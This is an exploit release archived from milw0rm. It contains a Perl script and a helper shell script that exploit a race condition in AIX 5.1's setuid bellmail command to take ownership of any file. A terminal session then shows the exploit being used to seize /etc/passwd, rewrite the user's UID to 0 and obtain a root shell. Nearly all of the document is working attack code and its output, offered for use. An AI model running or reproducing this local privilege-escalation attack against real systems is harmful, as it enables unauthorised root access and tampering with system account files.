| -bash-2.05b$ | |
| -bash-2.05b$ cat x_aix5_bellmail.pl | |
| #!/usr/bin/perl | |
| # FileName: x_aix5_bellmail.pl | |
| # Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail | |
| # command on Aix5 to change any file owner to current user. | |
| # | |
| #Usage : x_aix5_bellmail.pl aim_file | |
| # aim_file : then file wich you want to chown to you. | |
| # Note : Maybe you should run more than one to "Race condition". | |
| # The file named "x_bell.sh" can help you to use this exp. | |
| # You should type "w" "Enter" then "q" "Enter" key on keyboard | |
| # as fast as you can when bellmail prompt "?" appear. | |
| # | |
| # Author : watercloud@xfocus.org | |
| # XFOCUS Team | |
| # http://www.xfocus.net (CN) | |
| # http://www.xfocus.org (EN) | |
| # | |
| # Date : 2004-6-6 | |
| # Tested : on Aix5.1. | |
| # Addition: IBM had offered a patch named "IY25661" for it. | |
| # Announce: use as your owner risk! | |
| $CMD="/usr/bin/bellmail"; | |
| $MBOX="$ENV{HOME}/mbox"; | |
| $TMPFILE="/tmp/.xbellm.tmp"; | |
| $AIM_FILE = shift @ARGV ; | |
| $FORK_NUM = 1000; | |
| die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE; | |
| unlink $MBOX; | |
| system "echo abc > $TMPFILE"; | |
| system "$CMD $ENV{LOGIN} < $TMPFILE"; | |
| unlink $TMPFILE; | |
| $ret=`ls -l $AIM_FILE"`; | |
| print "Before: $ret"; | |
| if( fork()==0 ) | |
| { | |
| &deamon($FORK_NUM); | |
| exit 0 ; | |
| } | |
| sleep( (rand()*100)%4); | |
| exec $CMD; | |
| $ret=`ls -l $AIM_FILE"`; | |
| print "Now: $ret"; | |
| sub deamon { | |
| $num = shift || 1; | |
| for($i=0;$i<$num;$i++) { | |
| &do_real() if fork()==0; | |
| } | |
| } | |
| sub do_real { | |
| if(-e $MBOX) { | |
| unlink $MBOX ; | |
| symlink "$AIM_FILE",$MBOX; | |
| } | |
| exit 0; | |
| } | |
| #EOF | |
| -bash-2.05b$ | |
| -bash-2.05b$ cat x_bellmail.sh | |
| #!/bin/sh | |
| #File:x_bellmail.sh | |
| #The assistant of x_aix5_bellmail.pl | |
| #Author : watercloud@xfocus.org | |
| #Date :2004-6-6 | |
| # | |
| X_BELL_PL="./x_aix5_bellmail.pl" | |
| AIM=$1 | |
| if [ $# ne 1 ] ;then | |
| echo "Need a aim file name as argv." | |
| exit 1; | |
| fi | |
| if [ ! -e "$1" ];then | |
| echo "$1 not exist!" | |
| exit 1 | |
| fi | |
| if [ ! -x "$X_BELL_PL" ];then | |
| echo "can not exec $X_BELL_PL" | |
| exit 1 | |
| fi | |
| ret=`ls -l $AIM` | |
| echo $ret; echo | |
| fuser=`echo $ret |awk '{print $3}'` | |
| while [ "$fuser" != "$LOGIN" ] | |
| do | |
| $X_BELL_PL $AIM | |
| ret=`ls -l $AIM` | |
| echo $ret;echo | |
| fuser=`echo $ret |awk '{print $3}'` | |
| done | |
| echo $ret; echo | |
| #EOF | |
| -bash-2.05b$ id | |
| uid=201(cloud) gid=1(staff) | |
| -bash-2.05b$ | |
| -bash-2.05b$ oslevel | |
| 5.1.0.0 | |
| -bash-2.05b$ oslevel -r | |
| 5100-01 | |
| -bash-2.05b$ ls -l /usr/bin/bellmail | |
| -r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail | |
| -bash-2.05b$ ls -l /etc/passwd | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| -bash-2.05b$ cp /etc/passwd /tmp/ | |
| -bash-2.05b$ ./x_bellmail.sh /etc/passwd | |
| ./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid. | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:30 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:35 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:40 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:43 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| w | |
| From cloud Sun Jun 6 08:49:48 2004 | |
| abc | |
| ? From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? w | |
| bellmail: cannot append to /home/cloud/mbox | |
| ? w | |
| bellmail: cannot append to /home/cloud/mbox | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:49:56 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd | |
| From cloud Sun Jun 6 08:50:01 2004 | |
| abc | |
| ? w | |
| From cloud Sun Jun 6 08:25:20 2004 | |
| abc | |
| ? q | |
| -rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd | |
| -rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd | |
| -bash-2.05b$ cat /etc/passwd | |
| root:!:0:0::/:/usr/bin/ksh | |
| daemon:!:1:1::/etc: | |
| bin:!:2:2::/bin: | |
| sys:!:3:3::/usr/sys: | |
| adm:!:4:4::/var/adm: | |
| uucp:!:5:5::/usr/lib/uucp: | |
| guest:!:100:100::/home/guest: | |
| nobody:!:4294967294:4294967294::/: | |
| lpd:!:9:4294967294::/: | |
| lp:*:11:11::/var/spool/lp:/bin/false | |
| invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh | |
| nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico | |
| snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd | |
| imnadm:*:188:188::/home/imnadm:/usr/bin/ksh | |
| cloud:!:201:1::/home/cloud:/usr/local/bin/bash | |
| -bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd | |
| -bash-2.05b$ su cloud | |
| cloud's Password: | |
| 3004-502 Cannot get "LOGNAME" variable. | |
| -bash-2.05b$ id | |
| uid=201 gid=1(staff) | |
| -bash-2.05b$ ls -l /etc/passwd | |
| -rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd | |
| -bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd | |
| -bash-2.05b$ cat /etc/passwd | |
| root:!:0:0::/:/usr/bin/ksh | |
| daemon:!:1:1::/etc: | |
| bin:!:2:2::/bin: | |
| sys:!:3:3::/usr/sys: | |
| adm:!:4:4::/var/adm: | |
| uucp:!:5:5::/usr/lib/uucp: | |
| guest:!:100:100::/home/guest: | |
| nobody:!:4294967294:4294967294::/: | |
| lpd:!:9:4294967294::/: | |
| lp:*:11:11::/var/spool/lp:/bin/false | |
| invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh | |
| nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico | |
| snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd | |
| imnadm:*:188:188::/home/imnadm:/usr/bin/ksh | |
| cloud:!:0:1::/home/cloud:/usr/local/bin/bash | |
| test:!:201:1::/home/cloud:/usr/local/bin/bash | |
| -bash-2.05b$ su cloud | |
| cloud's Password: | |
| bash-2.05b# id | |
| uid=0(root) gid=1(staff) | |
| bash-2.05b# ls -l /etc/passwd | |
| -rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd | |
| bash-2.05b# cp /tmp/passwd /etc/passwd | |
| bash-2.05b# chown root /tmp/passwd | |
| bash-2.05b# ls -l /tmp/passwd | |
| -rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd | |
| bash-2.05b# id | |
| uid=0(root) gid=1(staff) | |
| bash-2.05b# | |
| bash-2.05b# rm /tmp/.bel* | |
| bash-2.05b# rm /tmp/passwd | |
| bash-2.05b# | |
| # milw0rm.com [2005-05-19] |